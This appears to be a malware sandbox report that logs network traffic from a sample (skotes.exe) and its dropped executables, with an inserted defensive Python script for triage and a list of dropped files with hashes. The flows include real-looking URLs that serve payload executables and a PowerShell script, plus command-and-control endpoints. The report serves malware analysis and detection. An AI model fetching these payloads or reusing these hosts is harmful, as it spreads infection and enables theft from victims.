                    Response
                    redirector.gvt1.com
                    IN AAAA
                    2a00:1450:4009:81e::200e
                  • flag-us
                    DNS
                    r3---sn-4g5edn6k.gvt1.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    r3---sn-4g5edn6k.gvt1.com
                    IN A
                    Response
                    r3---sn-4g5edn6k.gvt1.com
                    IN CNAME
                    r3.sn-4g5edn6k.gvt1.com
                    r3.sn-4g5edn6k.gvt1.com
                    IN A
                    74.125.111.136
                  • flag-us
                    DNS
                    r3.sn-4g5edn6k.gvt1.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    r3.sn-4g5edn6k.gvt1.com
                    IN A
                    Response
                    r3.sn-4g5edn6k.gvt1.com
                    IN A
                    74.125.111.136
                  • flag-us
                    DNS
                    r3.sn-4g5edn6k.gvt1.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    r3.sn-4g5edn6k.gvt1.com
                    IN AAAA
                    Response
                    r3.sn-4g5edn6k.gvt1.com
                    IN AAAA
                    2a00:1450:4001:d::8
                  • flag-us
                    DNS
                    play.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    play.google.com
                    IN A
                    Response
                    play.google.com
                    IN A
                    142.250.179.238
                  • flag-us
                    DNS
                    play.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    play.google.com
                    IN A
                    Response
                    play.google.com
                    IN A
                    142.250.179.238
                  • flag-us
                    DNS
                    play.google.com
                    firefox.exe
                    Remote address:
                    8.8.8.8:53
                    Request
                    play.google.com
                    IN AAAA
                    Response
                    play.google.com
                    IN AAAA
                    2a00:1450:4009:81d::200e
                  • 185.215.113.43:80
                    http://185.215.113.43/Zu7JuNko/index.php
                    http
                    skotes.exe
                    3.2kB
                    3.7kB
                    24
                    16

                    HTTP Request: POST http://185.215.113.43/Zu7JuNko/index.php
                    HTTP Response: 200
                    HTTP Request: POST http://185.215.113.43/Zu7JuNko/index.php
                    HTTP Response: 200
                    HTTP Request: POST http://185.215.113.43/Zu7JuNko/index.php
                    HTTP Response: 200
                    HTTP Request: POST http://185.215.113.43/Zu7JuNko/index.php
                    HTTP Response: 200
                    HTTP Request: POST http://185.215.113.43/Zu7JuNko/index.php
                    HTTP Response: 200
                    HTTP Request: POST http://185.215.113.43/Zu7JuNko/index.php
                    HTTP Response: 200
                    HTTP Request: POST http://185.215.113.43/Zu7JuNko/index.php
                    HTTP Response: 200
                    HTTP Request: POST http://185.215.113.43/Zu7JuNko/index.php
                    HTTP Response: 200
                    HTTP Request: POST http://185.215.113.43/Zu7JuNko/index.php
                    HTTP Response: 200
                    HTTP Request: POST http://185.215.113.43/Zu7JuNko/index.php
                    HTTP Response: 200
                    HTTP Request: POST http://185.215.113.43/Zu7JuNko/index.php
                    HTTP Response: 200
                  • 31.41.244.11:80
                    http://31.41.244.11/files/5131681669/KeaEfrP.ps1
                    http
                    skotes.exe
                    206.4kB
                    11.2MB
                    4366
                    11532

                    HTTP Request: GET http://31.41.244.11/files/6554834407/B3vKvPi.exe
                    HTTP Response: 200
                    HTTP Request: GET http://31.41.244.11/files/806475321/0tClIDb.exe
                    HTTP Response: 200
                    HTTP Request: GET http://31.41.244.11/files/7658082748/wTMEVe8.exe
                    HTTP Response: 200
                    HTTP Request: GET http://31.41.244.11/files/6554834407/ntRoEwh.exe
                    HTTP Response: 200
                    HTTP Request: GET http://31.41.244.11/files/5131681669/KeaEfrP.ps1
                    HTTP Response: 200
                  • 104.21.16.9:443
                    https://atten-supporse.biz/api
                    tls, http
                    0tClIDb.exe
                    982 B
                    4.3kB
                    9
                    9

                    HTTP Request: POST https://atten-supporse.biz/api
                    HTTP Response: 200
                  • 172.67.162.65:443
                    https://se-blurry.biz/api
                    tls, http
                    0tClIDb.exe
                    977 B
                    4.3kB
                    9
                    9

                    HTTP Request: POST https://se-blurry.biz/api
                    HTTP Response: 200
                  • 104.21.62.142:443
                    https://zinc-sneark.biz/api
                    tls, http
                    0tClIDb.exe
                    1.7kB
                    9.9kB
                    14
                    17

                    HTTP Request: POST https://zinc-sneark.biz/api
                    HTTP Response: 403
                    HTTP Request: POST https://zinc-sneark.biz/api
                    HTTP Response: 200
                  • 185.215.113.16:80
                    http://185.215.113.16/off/random.exe
                    http
                    skotes.exe
                    221.7kB
                    7.7MB
                    3827
                    5515

                    HTTP Request: GET http://185.215.113.16/luma/random.exe
                    HTTP Response: 200
                    HTTP Request: GET http://185.215.113.16/steam/random.exe
                    HTTP Response: 200
                    HTTP Request: GET http://185.215.113.16/well/random.exe
                    HTTP Response: 200
                    HTTP Request: GET http://185.215.113.16/off/random.exe
                    HTTP Response: 200
                  • 104.21.16.9:443
                    https://atten-supporse.biz/api
                    tls, http
                    78c83a40ec.exe
                    982 B
                    4.3kB
                    9
                    9

                    HTTP Request: POST https://atten-supporse.biz/api
                    HTTP Response: 200
                  • 172.67.162.65:443
                    https://se-blurry.biz/api
                    tls, http
                    78c83a40ec.exe
                    977 B
                    4.3kB
                    9
                    9

                    HTTP Request: POST https://se-blurry.biz/api
                    HTTP Response: 200
                  • 104.21.62.142:443
                    https://zinc-sneark.biz/api
                    tls, http
                    78c83a40ec.exe
                    1.7kB
                    9.9kB
                    14
                    16

                    HTTP Request: POST https://zinc-sneark.biz/api
                    HTTP Response: 403
                    HTTP Request: POST https://zinc-sneark.biz/api
                    HTTP Response: 200
                  • 185.215.113.206:80
                    http://185.215.113.206/c4becf79229cb002.php
                    http
                    2427caf3c8.exe
                    727 B
                    625 B
                    5
                    5

                    HTTP Request: GET http://185.215.113.206/
                    HTTP Response: 200
                    HTTP Request: POST http://185.215.113.206/c4becf79229cb002.php
                    HTTP Response: 200
                  • 127.0.0.1:50992
                    firefox.exe
                  • 216.58.213.14:443
                    https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                    tls, http2
                    firefox.exe
                    1.9kB
                    9.0kB
                    15
                    20

                    HTTP Request: GET https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                  • 34.120.5.221:443
                    https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                    tls, http2
                    firefox.exe
                    1.7kB
                    12.3kB
                    13
                    18

                    HTTP Request: GET https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=40249-e88c401e1b1f2242d9e441c4&locale_lang=en-US&region=GB&count=30
                  • 142.250.180.14:443
                    https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                    tls, http2
                    firefox.exe
                    3.0kB
                    66.7kB
                    32
                    63

                    HTTP Request: GET https://www.youtube.com/account?=https%3A%2F%2Faccounts.google.com%2Fv3%2Fsignin%2Fchallenge%2Fpwd
                    HTTP Request: GET https://consent.youtube.com/m?continue=https%3A%2F%2Fwww.youtube.com%2Faccount%3F%3Dhttps%253A%252F%252Faccounts.google.com%252Fv3%252Fsignin%252Fchallenge%252Fpwd%26cbrd%3D1&gl=GB&m=0&pc=yt&cm=2&hl=en&src=1
                  • 34.117.121.53:443
                    firefox-settings-attachments.cdn.mozilla.net
                    tls
                    firefox.exe
                    1.5kB
                    21.1kB
                    15
                    23
                  • 142.250.200.46:443
                    consent.youtube.com
                    tls, http2
                    firefox.exe
                    1.2kB
                    7.6kB
                    10
                    10
                  • 127.0.0.1:51001
                    firefox.exe
                  • 142.250.187.196:443
                    https://www.google.com/favicon.ico
                    tls, http2
                    firefox.exe
                    1.8kB
                    7.5kB
                    14
                    16

                    HTTP Request: GET https://www.google.com/favicon.ico
                  • 88.221.134.155:80
                    http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
                    http
                    firefox.exe
                    7.3kB
                    467.0kB
                    152
                    339

                    HTTP Request: GET http://ciscobinary.openh264.org/openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip
                    HTTP Response: 200
                  • 142.250.180.14:443
                    redirector.gvt1.com
                    tls
                    firefox.exe
                    1.7kB
                    8.9kB
                    18
                    21
                  • 74.125.111.136:443
                    r3---sn-4g5edn6k.gvt1.com
                    tls
                    firefox.exe
                    321.9kB
                    8.7MB
                    5047
                    6248
                  • 142.250.179.238:443
                    play.google.com
                    tls, http2
                    firefox.exe
                    1.3kB
                    7.6kB
                    11
                    10
                  • 8.8.8.8:53
                    atten-supporse.biz
                    dns
                    78c83a40ec.exe
                    64 B
                    96 B
                    1
                    1

                    DNS Request: atten-supporse.biz
                    DNS Response: 104.21.16.9, 172.67.165.166

                  • 8.8.8.8:53
                    se-blurry.biz
                    dns
                    78c83a40ec.exe
                    59 B
                    91 B
                    1
                    1

                    DNS Request: se-blurry.biz
                    DNS Response: 172.67.162.65, 104.21.81.153

                  • 8.8.8.8:53
                    zinc-sneark.biz
                    dns
                    78c83a40ec.exe
                    61 B
                    93 B
                    1
                    1

                    DNS Request: zinc-sneark.biz
                    DNS Response: 104.21.62.142, 172.67.136.167

                  • 8.8.8.8:53
                    youtube.com
                    dns
                    firefox.exe
                    57 B
                    73 B
                    1
                    1

                    DNS Request: youtube.com
                    DNS Response: 216.58.213.14

                  • 8.8.8.8:53
                    spocs.getpocket.com
                    dns
                    firefox.exe
                    65 B
                    131 B
                    1
                    1

                    DNS Request: spocs.getpocket.com
                    DNS Response: 34.117.188.166

                  • 8.8.8.8:53
                    getpocket.cdn.mozilla.net
                    dns
                    firefox.exe
                    71 B
                    174 B
                    1
                    1

                    DNS Request: getpocket.cdn.mozilla.net
                    DNS Response: 34.120.5.221

                  • 8.8.8.8:53
                    youtube.com
                    dns
                    firefox.exe
                    57 B
                    73 B
                    1
                    1

                    DNS Request: youtube.com
                    DNS Response: 216.58.213.14

                  • 8.8.8.8:53
                    prod.ads.prod.webservices.mozgcp.net
                    dns
                    firefox.exe
                    82 B
                    98 B
                    1
                    1

                    DNS Request: prod.ads.prod.webservices.mozgcp.net
                    DNS Response: 34.117.188.166

                  • 8.8.8.8:53
                    prod.ads.prod.webservices.mozgcp.net
                    dns
                    firefox.exe
                    82 B
                    175 B
                    1
                    1

                    DNS Request: prod.ads.prod.webservices.mozgcp.net

                  • 8.8.8.8:53
                    youtube.com
                    dns
                    firefox.exe
                    57 B
                    85 B
                    1
                    1

                    DNS Request

                    youtube.com

                    DNS Response

                    2a00:1450:4009:816::200e

                  • 8.8.8.8:53
                    prod.pocket.prod.cloudops.mozgcp.net
                    dns
                    firefox.exe
                    82 B
                    98 B
                    1
                    1

                    DNS Request

                    prod.pocket.prod.cloudops.mozgcp.net

                    DNS Response

                    34.120.5.221

                  • 8.8.8.8:53
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    dns
                    firefox.exe
                    103 B
                    119 B
                    1
                    1

                    DNS Request

                    prod.content-signature-chains.prod.webservices.mozgcp.net

                    DNS Response

                    34.160.144.191

                  • 8.8.8.8:53
                    shavar.prod.mozaws.net
                    dns
                    firefox.exe
                    68 B
                    116 B
                    1
                    1

                    DNS Request

                    shavar.prod.mozaws.net

                    DNS Response

                    35.85.93.176
                    52.33.231.145
                    44.228.225.150

                  • 8.8.8.8:53
                    prod.pocket.prod.cloudops.mozgcp.net
                    dns
                    firefox.exe
                    82 B
                    110 B
                    1
                    1

                    DNS Request

                    prod.pocket.prod.cloudops.mozgcp.net

                    DNS Response

                    2600:1901:0:524c::

                  • 8.8.8.8:53
                    prod.content-signature-chains.prod.webservices.mozgcp.net
                    dns
                    firefox.exe
                    103 B
                    131 B
                    1
                    1

                    DNS Request

                    prod.content-signature-chains.prod.webservices.mozgcp.net

                    DNS Response

                    2600:1901:0:92a9::

                  • 8.8.8.8:53
                    shavar.prod.mozaws.net
                    dns
                    firefox.exe
                    68 B
                    153 B
                    1
                    1

                    DNS Request

                    shavar.prod.mozaws.net

                  • 8.8.8.8:53
                    prod.remote-settings.prod.webservices.mozgcp.net
                    dns
                    firefox.exe
                    94 B
                    110 B
                    1
                    1

                    DNS Request

                    prod.remote-settings.prod.webservices.mozgcp.net

                    DNS Response

                    34.149.100.209

                  • 8.8.8.8:53
                    prod.remote-settings.prod.webservices.mozgcp.net
                    dns
                    firefox.exe
                    94 B
                    187 B
                    1
                    1

                    DNS Request

                    prod.remote-settings.prod.webservices.mozgcp.net

                  • 216.58.213.14:443
                    youtube.com
                    https
                    firefox.exe
                    3.2kB
                    9.3kB
                    7
                    10
                  • 8.8.8.8:53
                    www.youtube.com
                    dns
                    firefox.exe
                    61 B
                    319 B
                    1
                    1

                    DNS Request

                    www.youtube.com

                    DNS Response

                    142.250.180.14
                    216.58.201.110
                    172.217.169.78
                    216.58.212.206
                    142.250.187.206
                    172.217.169.46
                    142.250.187.238
                    142.250.200.14
                    216.58.204.78
                    142.250.178.14
                    172.217.16.238
                    142.250.200.46
                    142.250.179.238
                    172.217.169.14

                  • 8.8.8.8:53
                    youtube-ui.l.google.com
                    dns
                    firefox.exe
                    69 B
                    293 B
                    1
                    1

                    DNS Request

                    youtube-ui.l.google.com

                    DNS Response

                    172.217.16.238
                    216.58.204.78
                    216.58.212.206
                    172.217.169.14
                    142.250.179.238
                    142.250.200.46
                    172.217.169.78
                    142.250.180.14
                    172.217.169.46
                    216.58.201.110
                    142.250.178.14
                    142.250.187.238
                    142.250.187.206
                    142.250.200.14

                  • 8.8.8.8:53
                    youtube-ui.l.google.com
                    dns
                    firefox.exe
                    69 B
                    181 B
                    1
                    1

                    DNS Request

                    youtube-ui.l.google.com

                    DNS Response

                    2a00:1450:4009:815::200e
                    2a00:1450:4009:821::200e
                    2a00:1450:4009:823::200e
                    2a00:1450:4009:820::200e

                  • 8.8.8.8:53
                    firefox-settings-attachments.cdn.mozilla.net
                    dns
                    firefox.exe
                    90 B
                    177 B
                    1
                    1

                    DNS Request

                    firefox-settings-attachments.cdn.mozilla.net

                    DNS Response

                    34.117.121.53

                  • 8.8.8.8:53
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    dns
                    firefox.exe
                    106 B
                    122 B
                    1
                    1

                    DNS Request

                    attachments.prod.remote-settings.prod.webservices.mozgcp.net

                    DNS Response

                    34.117.121.53

                  • 142.250.180.14:443
                    youtube-ui.l.google.com
                    https
                    firefox.exe
                    5.1kB
                    11.1kB
                    11
                    16
                  • 8.8.8.8:53
                    consent.youtube.com
                    dns
                    firefox.exe
                    65 B
                    81 B
                    1
                    1

                    DNS Request

                    consent.youtube.com

                    DNS Response

                    142.250.200.46

                  • 8.8.8.8:53
                    attachments.prod.remote-settings.prod.webservices.mozgcp.net
                    dns
                    firefox.exe
                    106 B
                    199 B
                    1
                    1

                    DNS Request

                    attachments.prod.remote-settings.prod.webservices.mozgcp.net

                  • 8.8.8.8:53
                    consent.youtube.com
                    dns
                    firefox.exe
                    65 B
                    81 B
                    1
                    1

                    DNS Request

                    consent.youtube.com

                    DNS Response

                    142.250.200.46

                  • 8.8.8.8:53
                    consent.youtube.com
                    dns
                    firefox.exe
                    65 B
                    93 B
                    1
                    1

                    DNS Request

                    consent.youtube.com

                    DNS Response

                    2a00:1450:4009:823::200e

                  • 142.250.200.46:443
                    consent.youtube.com
                    https
                    firefox.exe
                    2.2kB
                    9.3kB
                    9
                    11
                  • 8.8.8.8:53
                    www.google.com
                    dns
                    firefox.exe
                    60 B
                    76 B
                    1
                    1

                    DNS Request

                    www.google.com

                    DNS Response

                    142.250.187.196

                  • 8.8.8.8:53
                    www.google.com
                    dns
                    firefox.exe
                    60 B
                    76 B
                    1
                    1

                    DNS Request

                    www.google.com

                    DNS Response

                    142.250.187.196

                  • 8.8.8.8:53
                    www.google.com
                    dns
                    firefox.exe
                    60 B
                    88 B
                    1
                    1

                    DNS Request

                    www.google.com

                    DNS Response

                    2a00:1450:4009:81f::2004

                  • 142.250.187.196:443
                    www.google.com
                    https
                    firefox.exe
                    3.2kB
                    9.3kB
                    7
                    10
                  • 8.8.8.8:53
                    consent.youtube.com
                    dns
                    firefox.exe
                    65 B
                    81 B
                    1
                    1

                    DNS Request

                    consent.youtube.com

                    DNS Response

                    142.250.200.46

                  • 8.8.8.8:53
                    consent.youtube.com
                    dns
                    firefox.exe
                    65 B
                    81 B
                    1
                    1

                    DNS Request

                    consent.youtube.com

                    DNS Response

                    142.250.200.46

                  • 8.8.8.8:53
                    prod.balrog.prod.cloudops.mozgcp.net
                    dns
                    firefox.exe
                    82 B
                    98 B
                    1
                    1

                    DNS Request

                    prod.balrog.prod.cloudops.mozgcp.net

                    DNS Response

                    35.244.181.201

                  • 8.8.8.8:53
                    prod.balrog.prod.cloudops.mozgcp.net
                    dns
                    firefox.exe
                    82 B
                    175 B
                    1
                    1

                    DNS Request

                    prod.balrog.prod.cloudops.mozgcp.net

                  • 8.8.8.8:53
                    ciscobinary.openh264.org
                    dns
                    firefox.exe
                    70 B
                    286 B
                    1
                    1

                    DNS Request

                    ciscobinary.openh264.org

                    DNS Response

                    88.221.134.155
                    88.221.134.209

                  • 8.8.8.8:53
                    a19.dscg10.akamai.net
                    dns
                    firefox.exe
                    67 B
                    99 B
                    1
                    1

                    DNS Request

                    a19.dscg10.akamai.net

                    DNS Response

                    88.221.134.209
                    88.221.134.155

                  • 8.8.8.8:53
                    a19.dscg10.akamai.net
                    dns
                    firefox.exe
                    67 B
                    123 B
                    1
                    1

                    DNS Request

                    a19.dscg10.akamai.net

                    DNS Response

                    2a02:26f0:a1::58dd:869b
                    2a02:26f0:a1::58dd:86d1

                  • 8.8.8.8:53
                    redirector.gvt1.com
                    dns
                    firefox.exe
                    65 B
                    81 B
                    1
                    1

                    DNS Request

                    redirector.gvt1.com

                    DNS Response

                    142.250.180.14

                  • 8.8.8.8:53
                    redirector.gvt1.com
                    dns
                    firefox.exe
                    65 B
                    81 B
                    1
                    1

                    DNS Request

                    redirector.gvt1.com

                    DNS Response

                    142.250.180.14

                  • 8.8.8.8:53
                    redirector.gvt1.com
                    dns
                    firefox.exe
                    65 B
                    93 B
                    1
                    1

                    DNS Request

                    redirector.gvt1.com

                    DNS Response

                    2a00:1450:4009:81e::200e

                  • 142.250.180.14:443
                    redirector.gvt1.com
                    https
                    firefox.exe
                    3.3kB
                    9.3kB
                    8
                    10
                  • 8.8.8.8:53
                    r3---sn-4g5edn6k.gvt1.com
                    dns
                    firefox.exe
                    71 B
                    116 B
                    1
                    1

                    DNS Request

                    r3---sn-4g5edn6k.gvt1.com

                    DNS Response

                    74.125.111.136

                  • 8.8.8.8:53
                    r3.sn-4g5edn6k.gvt1.com
                    dns
                    firefox.exe
                    69 B
                    85 B
                    1
                    1

                    DNS Request

                    r3.sn-4g5edn6k.gvt1.com

                    DNS Response

                    74.125.111.136

                  • 8.8.8.8:53
                    r3.sn-4g5edn6k.gvt1.com
                    dns
                    firefox.exe
                    69 B
                    97 B
                    1
                    1

                    DNS Request

                    r3.sn-4g5edn6k.gvt1.com

                    DNS Response

                    2a00:1450:4001:d::8

                  • 74.125.111.136:443
                    r3.sn-4g5edn6k.gvt1.com
                    https
                    firefox.exe
                    1.9kB
                    5.9kB
                    6
                    7
                  • 8.8.8.8:53
                    play.google.com
                    dns
                    firefox.exe
                    61 B
                    77 B
                    1
                    1

                    DNS Request

                    play.google.com

                    DNS Response

                    142.250.179.238

                  • 8.8.8.8:53
                    play.google.com
                    dns
                    firefox.exe
                    61 B
                    77 B
                    1
                    1

                    DNS Request

                    play.google.com

                    DNS Response

                    142.250.179.238

                  • 8.8.8.8:53
                    play.google.com
                    dns
                    firefox.exe
                    61 B
                    89 B
                    1
                    1

                    DNS Request

                    play.google.com

                    DNS Response

                    2a00:1450:4009:81d::200e

                  • 142.250.179.238:443
                    play.google.com
                    https
                    firefox.exe
                    3.3kB
                    8.5kB
                    8
                    7
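Every flow in the listing above belongs to firefox.exe and goes to Mozilla, Google or Akamai infrastructure (Pocket, remote settings, content-signature chains, Balrog update checks, the OpenH264 and Widevine plugin fetches), which is the browser's own start-up traffic rather than the sample's. The following is an added example, not tria.ge's code and not part of the report, showing how to parse the listing in the one-value-per-line form printed here, drop that browser background noise, and flag any non-DNS flow to an IP that no DNS answer in the same capture ever returned (a direct-IP contact, which is how a client behaves when it was handed the address rather than a name). The suffix allowlist is an assumption drawn from the hosts in this report, and the last entry in the embedded sample (process "sample.exe", destination 203.0.113.10, a TEST-NET-3 address) is hypothetical and exists only to exercise the checks.

```python
"""Triage helper for a flattened tria.ge network listing.  Added example,
not tria.ge code: parses '•'-bulleted entries, filters browser noise and
reports non-DNS flows whose destination IP was never returned by DNS."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample: the first four entries are copied from this report's
# listing; the last is HYPOTHETICAL (process name and 203.0.113.10, a
# TEST-NET-3 address, are made up) to show a direct-IP contact.
SAMPLE = "\n".join([
    "• 8.8.8.8:53", "youtube.com", "dns", "firefox.exe", "57 B", "73 B", "1", "1",
    "", "DNS Request", "", "youtube.com", "", "DNS Response", "", "216.58.213.14", "",
    "• 8.8.8.8:53", "shavar.prod.mozaws.net", "dns", "firefox.exe", "68 B", "116 B", "1", "1",
    "DNS Request", "shavar.prod.mozaws.net", "DNS Response",
    "35.85.93.176", "52.33.231.145", "44.228.225.150",
    "• 8.8.8.8:53", "prod.ads.prod.webservices.mozgcp.net", "dns", "firefox.exe",
    "82 B", "175 B", "1", "1", "DNS Request", "prod.ads.prod.webservices.mozgcp.net",
    "• 216.58.213.14:443", "youtube.com", "https", "firefox.exe", "3.2kB", "9.3kB", "7", "10",
    "• 203.0.113.10:80", "203.0.113.10", "http", "sample.exe", "1.1kB", "2.0kB", "3", "4",
])


@dataclass
class Flow:
    dest: str                       # "ip:port" exactly as printed
    name: str                       # hostname, or an IP literal when no name was used
    proto: str                      # dns / http / https ...
    process: str
    sent: int                       # bytes, client -> server
    received: int                   # bytes, server -> client
    pkts_out: int
    pkts_in: int
    query: str | None = None        # DNS entries only
    answers: list[str] = field(default_factory=list)

    @property
    def dest_ip(self) -> str:
        return self.dest.rsplit(":", 1)[0]


def parse_size(s: str) -> int:
    """'65 B' -> 65, '3.2kB' -> 3200 (the listing uses decimal units)."""
    m = re.fullmatch(r"([\d.]+)\s*(B|kB|MB)", s.strip())
    if not m:
        raise ValueError(f"unrecognised size: {s!r}")
    return int(round(float(m.group(1)) * {"B": 1, "kB": 1000, "MB": 1_000_000}[m.group(2)]))


def parse_flows(text: str) -> list[Flow]:
    """A '•' line opens a record; the next seven non-empty lines are the fixed
    columns; an optional 'DNS Request' / 'DNS Response' block follows."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    flows: list[Flow] = []
    i = 0
    while i < len(lines):
        if not lines[i].startswith("•"):
            i += 1
            continue
        dest = lines[i][1:].strip()
        name, proto, process, sent, recv, out, inn = lines[i + 1:i + 8]
        flow = Flow(dest, name, proto, process, parse_size(sent), parse_size(recv), int(out), int(inn))
        i += 8
        section = None
        while i < len(lines) and not lines[i].startswith("•"):
            if lines[i] == "DNS Request":
                section = "q"
            elif lines[i] == "DNS Response":
                section = "a"
            elif section == "q":
                flow.query = lines[i]
            elif section == "a":
                flow.answers.append(lines[i])
            i += 1
        flows.append(flow)
    return flows


# ASSUMPTION: Firefox start-up infrastructure observed in this report; tune per sandbox image.
BROWSER_PROCESSES = {"firefox.exe"}
BROWSER_NOISE_SUFFIXES = ("mozilla.net", "mozaws.net", "mozgcp.net", "getpocket.com",
                          "google.com", "youtube.com", "gvt1.com", "akamai.net", "openh264.org")


def is_browser_noise(f: Flow) -> bool:
    if f.process.lower() not in BROWSER_PROCESSES:
        return False
    host = f.name.lower()
    return any(host == s or host.endswith("." + s) for s in BROWSER_NOISE_SUFFIXES)


def direct_ip_contacts(flows: list[Flow]) -> list[Flow]:
    """Non-DNS flows to an IP that no DNS answer in the capture returned."""
    resolved = {ip for f in flows if f.proto == "dns" for ip in f.answers}
    return [f for f in flows if f.proto != "dns" and f.dest_ip not in resolved]


def bytes_by_process(flows: list[Flow]) -> dict[str, tuple[int, int]]:
    totals: dict[str, tuple[int, int]] = {}
    for f in flows:
        s, r = totals.get(f.process, (0, 0))
        totals[f.process] = (s + f.sent, r + f.received)
    return totals


if __name__ == "__main__":
    flows = parse_flows(SAMPLE)
    for f in flows:
        if not is_browser_noise(f):
            print("KEEP", f.process, f.proto, f.dest, f.name)
    for f in direct_ip_contacts(flows):
        print("DIRECT-IP", f.process, f.dest)
    print(bytes_by_process(flows))
```

Run over the full report text, the noise filter removes every firefox.exe flow shown in this section, so whatever remains is what the dropped executables did on the wire; the direct-IP check is deliberately conservative and only reports addresses with no DNS answer anywhere in the same listing, so a sample that resolves a name and then connects is not flagged by it.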

                  MITRE ATT&CK Enterprise v15

                  Downloads

                  • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\activity-stream.discovery_stream.json.tmp
                      Filesize  23KB
                      MD5       75f6e8b4105fa9fede84f65f6800f093
                      SHA1      09a71ef491c7440f2eb836cf6d7169f6e40ba064
                      SHA256    59e2066df7f8d5151618f0f6f1efb59df9ca4f5f2a5e8c1cf0d0768061ce7fb4
                      SHA512    3b88d43a17fd008553e9784d7843b15655bf1e239b91cd8046237bd4452acd3fcd24d493b4e799d83380f7295aed4f5f389d423075b74673f5e8b5125826469f

                  • C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\ytcgl2sn.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
                      Filesize  15KB
                      MD5       96c542dec016d9ec1ecc4dddfcbaac66
                      SHA1      6199f7648bb744efa58acf7b96fee85d938389e4
                      SHA256    7f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
                      SHA512    cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658

                  • C:\Users\Admin\AppData\Local\Temp\1013210001\B3vKvPi.exe
                      Filesize  2.2MB
                      MD5       3541c1ac26eb5bbb87f01c20fd9f8824
                      SHA1      bf5d136c911491f59bdeb3bf37b8f1a155fd3a97
                      SHA256    b7cd929ce4d0fa849eeab8a216e1333f63c7d3530da674f163efab4dae3439d1
                      SHA512    babc17723d2389919acd96f977821d57bdd737f01a9598209efafa72ae0418e914a5d229f196d80cb5ba70ce82b0f340b18aa255bbe4ed77d821a432d5794a93

                  • C:\Users\Admin\AppData\Local\Temp\1013229001\0tClIDb.exe
                      Filesize  1.8MB
                      MD5       6367fb8a64f997be8d65536534bdd057
                      SHA1      3ee062142dde2330881566a63a92957037a0e6b3
                      SHA256    bdae46a5cb1f1b6b9864b5e944ed5b2e24622d7385a196e0293f7b9da59bda5e
                      SHA512    ace2dbba313180a64f70f49c7763fb9da23ef76b82548c8fa54a7d1e8d4810cad83726fe532459660e12e4f6a9210df09dd836ea28f1cc5a791a4873b95a274c

                  • C:\Users\Admin\AppData\Local\Temp\1013238001\wTMEVe8.exe
                      Filesize  3.9MB
                      MD5       5db95c4de9b6e98c653ac3dec5dce83d
                      SHA1      c3e1cb98b5450d21c8e9e975148c282afcf4ccae
                      SHA256    8ac4f1dcdf7ce5276d4ee9dbdaeaa4232aa8ad0c383bf804472f156ae2a879c7
                      SHA512    42e5504904f0db4e62d56c03c8e7e302df0eba488a966259aa686e7d952db8a25eb56b5ac72731400cfd2541b6429d82e95e3bb8e87565bdf0cbe2b488c47368

                  • C:\Users\Admin\AppData\Local\Temp\1013244001\78c83a40ec.exe
                      Filesize  1.8MB
                      MD5       c42fbc53b1b42194728f4f5904cc925a
                      SHA1      e62e1d938f9a9be31f3ccb82ece3997354df132b
                      SHA256    46253c842675dfbc5fc9c852bcf64e6d6175b6efe9d81774b6d84e42a3be9cb9
                      SHA512    e833b0fa711fd4bfaf3f00c1d816b4f7988959f445509089f4795f4d6a419aed154b2d33cb71ea49e918c82ba0545d70a36eed8687597378b0065817f8bb5f95

                  • C:\Users\Admin\AppData\Local\Temp\1013245001\2427caf3c8.exe
                      Filesize  1.7MB
                      MD5       7dcf4c4df2997ccd8c4a0fd2398b784a
                      SHA1      7f623f31d30a0d45058eeaa38f12ecf43f54fd33
                      SHA256    4c2d2f9f76daff7560ac8bf55c348f7051216db171fba2a25f7ac939410b7cff
                      SHA512    697dbc4f0cda3affdfcf0639b53de8a67273cd4ff3e356236277cb2851c6c24be67c4b6ed51bc1229a842ddbd53231b07d2b9dba2d484447240066ad32845d1b

                  • C:\Users\Admin\AppData\Local\Temp\1013246001\8b0d03025f.exe
                      Filesize  948KB
                      MD5       ea332702c8adf6f8be3dd834363924bd
                      SHA1      eaf972aeb4a0eebeede9b2a53c48670965af4d17
                      SHA256    3b609f119a3ac3d881d7e2e7bf637618500e6d5afe0b65f9087b6653cbbc42eb
                      SHA512    02662320d09805f2a09fd7431576a7b70c83fdc2ea6a139e53c23509705659b4a9034f135383166b0c0d0f3777f0220a53d2e7a02a2a1642af96eb0030cb44fc

                  • C:\Users\Admin\AppData\Local\Temp\1013247001\dd94fa9303.exe
                      Filesize  2.7MB
                      MD5       ed56e3fd052ff78dc552adc8c68c1ae1
                      SHA1      a3ec743c5faf04b546213f35d186599704da24c3
                      SHA256    d4a86adb78b87482ffaf354bdddfd4b0db486b10de088f923851c23e25f7813b
                      SHA512    975391c94d487377d5c3c240a9f83b8edaad51f9cab4bfb6f7705a23ab8a0435961bde4f3469f30b3c1c351586f4d664a091eb3584bd21c33524735fbc3e7556

